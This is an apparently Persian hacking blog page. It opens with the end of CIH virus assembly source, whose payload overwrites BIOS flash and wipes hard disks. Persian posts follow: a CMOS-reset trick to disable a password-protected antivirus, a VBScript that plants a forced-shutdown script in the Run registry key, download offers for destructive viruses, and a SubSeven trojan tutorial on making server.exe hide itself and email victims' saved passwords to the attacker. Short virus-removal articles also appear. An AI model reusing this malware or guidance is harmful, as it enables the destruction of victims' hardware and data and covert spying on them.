LoopOfWriteVirusCodeToFile ; *************************** ; * Let's Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) pushf ; ************************************* ; * Close File * ; ************************************* CloseFile: xor eax, eax mov ah, 0d7h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Need to Restore File Modification * ; * Time !? * ; ************************************* popf pop esi jnc IsKillComputer ; ************************************* ; * Restore File Modification Time * ; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Disable OnBusy * ; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy ; ************************************* ; * Call Previous FileSystemApiHook * ; ************************************* prevhook: popad mov eax, dr0 ; jmp [eax] ; Jump to prevhook ; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; ************************************* pIFSFunc: mov ebx, esp push dword ptr [ebx+20h+04h+14h] ; Push pioreq call [ebx+20h+04h] ; Call pIFSFunc pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ; *************************** ; * After Calling pIFSFunc, * ; * Get Some Data from the * ; * Returned pioreq. * ; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h jne QuitMyVirusFileSystemHook ; ***************** ; * Get the File * ; * Modification * ; * Date and Time * ; * in DOS Format.* ; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ; *************************** ; * Quit My Virus' * ; * IFSMgr_FileSystemHook * ; *************************** QuitMyVirusFileSystemHook: popad ret ; ************************************* ; * Kill Computer !? ... *^_^* * ; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? IF DEBUG jmp DisableOnBusy ELSE jnz DisableOnBusy ENDIF ; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and al,0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... * ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al,10h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h VxDCallTableSize = ($-VxDCallIDTable)/04h ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db 'CIH v' db MajorVirusVersion+'0' db '.' db MinorVirusVersion+'0' db ' TATUNG' ; ********************************************************* ; * Virus Size * ; ********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 FileModificationTime dd ? FileNameBuffer db FileNameBufferSize dup(?) @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? TimeDateStamp dd ? SymbolsPointer dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? _Characteristics dw ? Magic dw ? LinkerVersion dw ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? @9 = $ SectionAlignment dd ? FileAlignment dd ? OperatingSystemVersion dd ? ImageVersion dd ? SubsystemVersion dd ? Reserved dd ? SizeOfImage dd ? SizeOfHeaders dd ? SizeOfImageHeaderToRead = $-NumberOfSections NewAddressOfEntryPoint = DataBuffer ; DWORD SizeOfImageHeaderToWrite = 04h StartOfSectionTable = @9 SectionName = StartOfSectionTable ; QWORD VirtualSize = StartOfSectionTable+08h ; DWORD VirtualAddress = StartOfSectionTable+0ch ; DWORD SizeOfRawData = StartOfSectionTable+10h ; DWORD PointerToRawData = StartOfSectionTable+14h ; DWORD PointerToRelocations = StartOfSectionTable+18h ; DWORD PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD NumberOfRelocations = StartOfSectionTable+20h ; WORD NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD Characteristics = StartOfSectionTable+24h ; DWORD SizeOfScetionTable = Characteristics+04h-SectionName ; ********************************************************* ; * Virus Total Need Memory * ; ********************************************************* VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9 ; + NumberOfSections(??)*SizeOfScetionTable(28h) ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ; ********************************************************* ; ********************************************************* VirusGame ENDS END FileHeader </body> </html> </body> </html> </body> </html>

اگر سي پي يو تون رو دوست دارين به هيچ وجه اين فايل را در سيستم خود اجراي نکنيد و گرنه

با این برنامه می توانید به سلیقه خودتان ویروس طراحی کنید

Size: 73 KB
Download

غیر فعال کنیم

 که انتی ویروس های که برای غیر فعال کردنش PASSمی خواد   غیر فعال کنیم

خوب شروع کنیم

این کد را برید  تو داس اجرا کنید و بعد از اجرا  انتی ویروس غیر فعال شود

DEDUG

.70 10

.71 10

G

برنامه که میبینید یه ویروس مکر قوییه

این کد ها رو در یه فایل نوت پد کپی

  این کد ها رو در یه فایل نوت پد کپی کرده و از منوی فایل گزینه ی save as

رو اتخاب کنید و جلوی اسمشrestart.bat رو بنویسید

Sub ShutDown

Set FSO = CreateObject("Scripting.FileSystemObject")

Set TxtFile = FSO.CreateTextFile("c:\restart.vbs", 2, False)

TxtFile.WriteLine "Sub ShutDown "

TxtFile.WriteLine "nLogOff=0 "

TxtFile.WriteLine "nReboot=2 "

TxtFile.WriteLine "nForceLogOff=4 "

TxtFile.WriteLine "nForceReboot=6 "

TxtFile.WriteLine "nPowerDown=8 "

TxtFile.WriteLine "nForcePowerDown=12 "

TxtFile.WriteLine "Set oOS = GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+").ExecQuery("+chr(34)+"Select * from Win32_OperatingSystem"+chr(34)+") "

TxtFile.WriteLine "For Each oOperatingSystem in oOS "

TxtFile.WriteLine " oOperatingSystem.Win32Shutdown(nForcePowerDown) "

TxtFile.WriteLine "Next "

TxtFile.WriteLine "End sub "

TxtFile.WriteLine "ShutDown "

TxtFile.Close

Set WshShell = CreateObject("WScript.Shell")

WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs"

End sub

ShutDown 

آشنايي با كاربردهاي بوت نت!!

  آشنايي با كاربردهاي بوت نت!!
bootnetچيست؟
سايت مايكرو سافت در زير حملات ddos از سرويس خارج شد.
دستگيري عاملان حمله اي كه موجب خروج سرور هاي فرود گا هي روسيه از
سرويس دهي شد.بسته شدن چند شبكه wareZزير زميني توسط FBI.
و هزاران خبر مشابه اينها از اغلب ريشه در شبكه ها و سرور هاي IRCدارد بارها
و بارهااز جلوي رويمان گذشته و احتمالا شما دوست  داريد بدانيد كه اين كار ها چطور در شبكه هاي IRC
و بدور ازحس هاي ضعيف گردانندگان مبارزه عليه هكر ها انجام مي گيرد .
امروز من قصد دارم تا شما رو با يكي از مهم ترين راههاي راه اندازي و مديريت
شبكه هاي wareZو حملات DDOSمدريت شده در شبكه هاي IRC آشنا كنم.
جواب تمام اين سوالات در يك كلمه مي باشدBOTNET!!(شبكها ي ربات)
خب ديگه براي اين درس كافيه ادامه ي اين مقاله باشه براي بعد از زنگ تفريح ok!!

این یه نسخه جدید از ویروس VBLOVE هستش که به اون یک سری چیزا اضافه شده

این ویروس میتونه بوت سیستم قربانی رو حذف کنه

  این ویروس میتونه بوت سیستم قربانی رو حذف کنه که سیستم و ویندورز طرف بالا نمیاد

...دریافت...

CDReg

این ویروس هم سیدی روم قربانی رو آنقدر باز و بسته میکنه که طرف یا باید ویندوز اوز کنه یا کابله

برق سی دی رومش رو در بیاره ...دریافت...

F32CPU

این ویروس هم سی پی یو قربانی رو میبره تا ۲۰۰ Usag  و سی پی یو قربانی یک سلفه میکنه

و بعدش اشهد میخونه ...دریافت...

QpUrl

این یکی هم صفحه ی مانیتور قربانی رو بر عکس میکنه که احتمالا خطر ناکه ممکنه ضرر داشته باشه

...دریافت...

ویروس جدید یاهو مسنجر در حال آلوده کردن کاربران با نام YahLover

یکی از قوی ترین و شایعترین ویروس/تروجان هایی که اخیرآ در حال گسترش بین

کاربران استفاده کننده از یاهو مسنجر می باشد ویروس "Exploit.JS.ADODB.Stream.e" است

. در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه

 شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ا

رسال می شود. بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلود

ه خواهند شد.
هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می

 شود که ویروس مذکور به سرقت اطلاعات و رمز های شخصی افراد می پردازد.

در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر

 مناسبترین گزینه برای از بین بردن آن است:
پیام و لینک هایی که این ویروس ارسال می کند چیست ؟!
در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است

که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود.

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟!
1- در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به

 سایت nsl-school.org تغییر می دهد. در این صورت به هیچ طریق امکان عوض

 کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن یک صفحه وب جدید، ویروس مجددآ خود را در

 سیستم شما کپی می کند.

2- گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند

 تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد.

3- فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد

 می شوند. (برای اطمینان پوشه های windows و temp را بررسی کنید.)

4- ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما

 (Yahoo Messenger ID List) ارسال می کند.

چگونه ویروس را از کامپیوتر خود پاک کنیم ؟!
راه ها و روش های مختلفی برای حذف این ویروس معرفی شده است.
ولی روش معرفی شده در اینجا راحت ترین روش است!
فایل زیر را دانلود کنید و سپس فایل YVRemove.bat را از داخل آن اجرا نمائید.

دانلود - 4 کیلوبایت
پسورد: www.p30download.com

باعث خاموش شدن کامپیوترمیشه

ویروس Looked-BA

توضیحات :

Looked-BA ویروسی است که فایل های exe در کامپیوتر آلوده را تحت تاثیر قرار می دهد و از طریق کامپیوتر های شبکه با پسوردهای ضعیف منتشر می شود .

این ویروس می تواند به اینترنت متصل شود و از طریق پورت80 (HTTP ) با سرور راه دور ارتباط برقرار می کند .

زمانی که ویروس Looked-BA اجرا می شود در \rundl132.exe کپی می شود و فایل \Dll.dll ، که مانند کرم Looked-AP تشخیص داده می شود را ایجاد می کند .

همچنین با نصب ویروس فایل های متنی بی ضرر زیادی با نام "_desktop.ini در پوشه های متفاونی از کامپیوتر آلوده ایجاد می شود .

با اجرای فایل rundl132.exe مدخل زیر در رجیستری ایجاد می شود :

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
load
\rundl132.exe

مدخل زیر نیز ایجاد می شود :

HKLM\SOFTWARE\Soft\DownloadWWW\

توصیه ها :

              1  .        به روز كردن آنتي ويروس

              2  .       دريافت Removal از سايت  Kaspersky

              3 .       روش پاك سازي به صورت دستي :

ابتدا تمامي داده خود را در سيستم تغيير داده و يك كپي از آنها تهيه كنيد.

پسورد Administrator را دوباره تغيير دهيد و يك نگاهي به مسايل امنيتي شبكه خود بيندازيد.

در taskbar دكمه start را بزنيد و منوي run را اجرا كنيد و در آن Regedit را بنويسيد و دكمه ok را كليك كنيد تا صفحه ويرايشگر رجيستري شما باز شود . فراموش نكنيد كه قبل از دستكاري رجيستري يك نسخه پشتيبان از آن تهيه كنيد .

براي تهيه نسخه پشتيبان از رجيستري خود ؛ در منوي Registry روي گزينه"''Export Registry File  و در پنل''''''''Export range'''''''' گزينه All را انتخاب كرده و سپس دكمه Save را كليك كنيد تا نسخه پشتيبان از رجيستري شما تهيه شود.

حال در مدخل HKEY_CURRENT_USER  HKEY_LOCAL_MACHINE ,رجيستري زير مدخلهاي:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
load
\rundl132.exe

HKLM\SOFTWARE\Soft\DownloadWWW\

هر مدخلي كه به فايلي اشاره مي كرد حذف كنيد.

سپس رجيستري خود را ببنديد و دوباره سيستم خود را راه اندازي كنيد.

هک

نام کتاب آموزش قدم به قدم هک

نویسنده صمدی، آراز
موضوع اصلی کامپیوتر
موضوع فرعی هک
جلد ۱
حجم فایل ۵۷۱ کیلوبایت
قالب کتاب PDF
تاریخ ثبت ۱۳۸۴/۴/۲۱
دفعات دریافت

Spy Uploader

دانلود

آموزش کامل ساب سون ورژن 2.2

دانلود

انواع هکرها


1. New bie : به هکرهای مبتدی گفته می شود .
2. Lammer : به New bie های پرمدعا گفته می شود .
3. Black Hats : با Crackers از آنها یاد می شود ، اینگونه افراد به اطلاعات و سیستم های رایانه ای از قبیل سیستم های امنیتی بانک ها ، سایتهای اینترنتی و همچنین سیستم های خانگی Client ها آسیب می رسانند و هیچگونه پایبندی به موازین اخلاقی و قانونی ندارند .
4. White Hats : از آنها به عنوان شوالی های دنیای هک یاد می شود ، اینگونه افراد از دانش خود در راه درست استفاده می کنند و معمولا به عنوان مشاوران امنیتی ، مدیران سیستم های رایانه ای و برنامه نویسان مشغول به فعالیت هستند و هیچگونه ضرر و زیانی به سیستم های رایانه ای نمی رسانند و در حقیقت نقش Helper را ایفا می کنند و به کمک مردم می پردازند و دانش خود را در اختیار همگان می گذارند ... .
5. Gray Hats : از آن ها به عنوان مرز میان دسته سوم و چهارم هکرها یاد می شود ، بدینصورت که اینگونه افراد هم به عنوان Cracker و هم به عنوان Helper در دنیای هک نقش ایفا می کنند . یعنی بدینصورت که هم به سیستم های رایانه ای ضرر می رسانند و هم به عنوان مشاوران امنیتی به مردم کمک می رسانند .

تعریف چند اصطلاح - Dofinitions Of Expressions
Ping : جهت فرستادن data به كار مي رود و محاسبه سرعت رفت و برگشت و موارد دسترسي را Ping كردن گونيد .
Whoise : پيدا كردن IP و رديابي مكاني آنرا گونيد .
Server.exe : يك فايل اجرائي است كه كلا در نرم افزار Sub Seven پايه و اساس ورود به سيستم هاي رايانه اي به و جود اين فايل اجرائي بنا شده ، نه تنها نرم افزار Sub Seven بلكه تمامي نرم افزارهائي كه مانند ساب سون احتياج به يك فايل اجرائي Server.exe دارند . در حقيقت فرد هك كننده يا هكر يك فايل اجرائي Server.exe كه حال مي تواند به هر اسمي دلخواه باشد را از طرق مختلف كه بعدا در مورد آن توضيح داده خواهد شد براي شخصي در اينترنت ارسال مي كند و هنگاميكه آن فرد Server.exe را اجرا كند فقط با يك كليك ماووس ، شخص هكر مي تواند توسط فايل Client كه توضيحات بيشتر نيز در مورد اين فايل بعدا گفته خواهد شد ، امكان ارتباط با كامپيوتر شخص هك شده را خواهد يافت و مي تواند به طور كلي بر كامپيوتر فرد هك شونده در زماني خيلي كم كنترل پيدا كند .
: Victimبه كامپيوتري اطلاق مي شود كه فايل اجرائي Server.exe روي آن اجرا شود در اصل يعني كامپيوتر قرباني و هك شونده .
: Subبه معني تحت ، تابع ، مادون ،‌ فرع ، جاي كسي را گرفتن و جايگزين كردن مي باشد .
IP/TCP : مخفف Internet Protocol مي باشد و يكي از پروتكل هاي مورد استفاده در اينترنت مي باشد .
Port : مقاديري مجازي هستند كه در ارتباطات مبتني بر TCP/IP كاربرد دارند و برنامه هاي شبكه از طريق آن ها به سرويس هاي مختلف دست مي يابند ، محدوده Port ها بين صفر تا 65535 مي باشد كه از شماره صفر تا 1023 رزرو شده مي باشد . مثلا سرويس http كه به منظور مشاهده صفحات web به كار مي رود روي Port شماره 80 فعال است . در حقيقت در دنياي هك Sub Seven ، كامپيوتر خانه اصلي اينترنتي مورد نظر مي باشد . IP آدرس اينترنتي اين خانه مورد نظر مي باشد .Port درب هاي ورودي به اين خانه مي باشد Server.exe در اين خانه وظيفه جاسوسي به صورت يك دوربين مخفي و مدار بسته را ايفا مي كند . شخص هكر براي جاسوسي به كامپيوتر قرباني با ارسال يك فايل اجرائي حمله ور شده ابتد امي بايست آدرس اين خانه يا كامپيوتر قرباني رو بدست بياورد كه خانه اصلي ID شخص مورد نظر مي باشد مانند Yahoo ID و حال هكر احتياج به آدرس دارد كه IP آدرس اين خانه يا کامپيوتر مي باشد كه از چند كاركتر بصورت عدد تشكيل شده مانند مثال : 216.156.98.42 كه اين اعداد از 0 تا 256 متغيرند و در هر بار متصل شدن به اينترنت اين اعداد تغيير پيدا مي كند و اين IP ها از سوي ISP هائي كه Account در اختيار User كاربر مي گذارند اختصاص داده مي شود و هر ISP براي خود IP مخصوصي دارد و تعدادي IP در اختيار دارد كه به Userها اختصاص مي دهد . حال هكر احتياج به اين دارد كه بداند چه درب هائي براي ورود به اين خانه وجود دارد كه در اصطلاح Port تلقي مي شود و پورت ها از عدد 0 تا 65535 متغيرند كه در ويندوزهاي 98 براحتي مي توان وارد اين سيستم عامل ها شد ولي در ويندوزهاي XP به دلايل امنيت فايروالي و حفاظت اكثر پورت هاي فعال كه اين مزيت را اين سيستم عامل ها دارند نمي توان براحتي وارد شد و به سختي اين كار امكان پذير است . حال شخص هكر احتياج به يك دوربين مخفي و مدار بسته دارد كه از آن بعنوان فايل اجرائي Server.exe ياد مي شود كه با كنترل بر اين فايل اجرائي شخص هكر مي تواند بر تمامي حركات افراد داخل خانه يا همان كامپيوتر قرباني هك شده Victim تسلط پيدا كند . و در آخر اين كه يك پست الكترونيكي E-mail واقع در سايت هات ميل Hotmail احتياج است كه تمامي اعمال ضبط شده بوسيله فايل اجرائي Server.exe اعم از بدست آوردن IP ، Port و تمامي پسوردهاي Save شده در كامپيوتر Victim و …….. با هربار وصل شدن كامپيوتر قرباني ويكتيم به اينترنت با فرستادن يك نامه الكترونيكي مايلmail ساده از سوي شخصي نامعلوم از سايت هات ميل Hotmail به پست الكترونيكي E-mail شخص هكر ، وي را از دانستن IP-Port با خبر می سازد.
آماده سازي فايل اجرائي Server.exe ؛ تذكر : ابتدا مي بايست نرم افزارهاي ويروس ياب خود را به دليل اينكه همين فايل اجرائي Server.exe نوعي ويروس تروجان تلقي مي شود از کار انداخت يا غيرفعال كرد . براي استفاده از Sub seven ابتدا بايد فايل اجرائي Server.exe را بطور كامل بشناسيم و طراحي اش كنيم . پس از بازكردن پوشه Sub seven سه فايل اجرائي exe.* براي ما قابل يافت مي باشد . اولين آن فايل Server.exe مي باشد كه بايد براي شخصي در اينترنت فرستاده شود كه اين فايل اجرائي قابليت كمي دارد ، پس براي تنظيم و افزايش قابليت بايد از فايل اجرائي Editserver.exe استفاده شود و پس از تنظيم براي شخصي در اينترنت به طرق مختلف فرستاده شود . برنامه Client براي برقراري ارتباط با Server استفاده مي شود . همانگونه كه قبلا گفته شد نياز به يك فايل اجرائي بنام Server.exe داريم كه بايد روي Victim اجرا شود ، بدين منظور در پوشه Sub Seven برنامه Editserver را انتخاب كرده ، در پنجره باز شده دو گزينه وجود دارد :
run inadvance mode - run innormal mode
run inadvance mode : كه قسمت اول براي كاربران حرفه اي است پس بهتر است كه شما گزينه دوم را انتخاب كنيد .
run innormal mode : حال اين گزينه را انتخاب كنيد صفحه Editserver پس از انتخاب باز مي شود كه داراي 8 گزينه و صفحه
مي باشد . گزینه server seting : پس از انتخاب اين گزينه در صفحه آن قسمت هاي مختلفي ظاهر مي شود كه مرور مي كنيم .
Port : اين گزينه شماره درگاهي است كه توسط آن با فايل Server.exe خود ارتباط برقرار مي كنيد .
تذكر : از انتخاب Port هاي 0 تا 1023 خودداري كنيد چون رزور شده است و بعنوان مثال یا پورتی را که خود برنامه انتخاب کرده و یا اینکه از Port شماره 30000 به بعد پورت هاي مورد نظر خويش را انتخاب كنيد .
Password : اين گزينه براي حفاظت از Server به كار مي رود به طوري كه فرد ديگري نتواند با Server ي كه شما ايجاد كرده ايد ارتباط برقرار كند مزيت آن اين است كه اگر هكر ديگري به Victim راه پيدا كند بدون Password نمي تواند از Server شما استفاده كند re-enterpassword : اين گزينه جهت جلوگيري از اشتباه به هنگام وارد كردن Password به كار مي رود .
آموزش Sub Seven 2.2 (قسمت دوم)

آموزش Sub Seven 2.2 (قسمت دوم)

Victim name : اين گزينه نام كامپيوتري است كه شما فايل Server.exe را براي آن ارسال مي كنيد و هر اسمي مي تواند باشد .
portec password : با انتخاب اين گزينه براي حفاظت از تغيير توانائي هايServer بعد از ارسال آن يك Password دروني برايServer مي گذاريم كه براي تغيير دادن تنظيمات مي باشد .
re-enterpassword : اين گزينه جهت جلوگيري از اشتباه به هنگام وارد كردن Password به كار مي رود .
use random port : با انتخاب اين گزينه هر باري كه Victim به اينترنت متصل مي شود Server به صورت تصادفي يك شماره Port را به Victim اختصاص مي دهد و پيشنهاد مي شود كه اين گزينه را فعال نكنيد ،چون با تعیین Server , Password محافظت مي شود.
melt server after installation : با انتخاب اين گزينه Server بعد از جدا شدن بر روي Victim خود را ناپديد مي كند ، بدين ترتيب عين اجراي عمليات خود براي هيچكس قابل ديدن نيست . در اصل شما مي توانيد با انتخاب كردن اين گزينه فايل Server.exe را بعد از اجرا شدن به حالت Hidden يا مخفي در بياوريد تا كسي از هويت اصلي آن با خبر نشود و بصورت مخفيانه عمليات محوله به خويش را انجام دهد .
wait for reboot : با انتخاب اين گزينه Server تا زمان راه اندازي مجدد Victim توانائي انجام وظايف محوله خويش را نخواهد داشت ، اگر اين گزينه را فعال كنيم باعث مي شود كه Server تا زماني كه Reset نشود فعاليت خود را آغاز نكند .
تذكر : بديهي است از انتخاب كردن گزينه فوق صرف نظر شود .
server filename : با انتخاب اين گزينه Server در هر بار اتصال به اينترنت به صورت تصادفي يك نام جداگانه را به Victim اختصاص مي دهد .
specify : با انتخاب اين گزينه Server به صورت دائمي نامي را به Victim اختصاص مي دهد و شما مي توانيد با انتخاب كردن اين گزينه يك نام دائمي براي Victim خود داشته باشيد كه مي توانيد همان اسمي رو كه قبلا به victim name خود اختصاص داده ايد را در اين جا انتخاب كنيد .
گزينهstartup methods : صفحه اصلي آن گزينه هائي مربوط به محل ذخيره سازي Server و نام Server به هنگام بالا آمدن و برخي گزينه هاي ديگر مي شود كه توصيه مي شود اين گزينه ها ( تنظيمات آن ها ) را به هيچ عنوان تغيير ندهيد .
گزینه notifications : اين گزينه به ترتيب مراحل زير فايل Server.exe را بسيار قدرتمند مي سازد .
add ICQ notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به ICQ شما ارسال مي كند كه اين گزينه مدنظر ما نمي باشد ولیکن اگر ICQ دارید حتما استفاده نمائید چون به تجربه ثابت کرده که خوب کار می کند .

add e-mail notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به e-mail شما در سايت هات ميل ارسال مي كند كه در اصل اين گزينه مدنظر ما مي باشد .
تذكر : توجه داشته باشيد كه حتما بايد e-mail انتخابي شما از سايت هات ميل باشد ، زيرا فايل Server.exe در فرستادن مايل به سايت هاي ديگر مانند سايت Yahoo مشكل دارد و در سايت هات ميل به راحتي مي تواند مايلي از سوي كامپيوتر Victim در هر بار اتصال Victim به اينترنت حاوي اطلاعات خواسته شده از سوي شما از قبيل شماره IP ، Port ، كليه Password های save شده و ….. را ارسال كند . در ضمن هر جائي كه از شما e-mail خواشته شده سعي كنيد يك e-mail بدهيد يعني در حقيقت e-mail انتخابي شما در هر گزينه كه خواسته شده يكي باشد و متغير نباشد .
add IRC notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به IRC شما ارسال مي كند كه اين گزينه مدنظر ما نمي باشد .
add SIN notify : اين گزينه به دليل كاربرد محدودي كه دارد توضيح داده نمي شود .
add CGI notify : اين گزينه به دليل كاربرد محدودي كه دارد توضيح داده نمي شود .
more info : اين گزينه به منظور ارائه توضيحات بيشتر در رابطه با پنج گزينه بالا به كار مي رود دراصل Help گزينه هاي بالا حساب مي شود .
current notifications: يك كادر آبي رنگ است كه پس از ايجاد يك notifications آن را درون اين جعبه ليست مشاهده خواهيد كرد كه به منظور پاك كردن آن كافي است روي آن دوبار كليك كنيد .
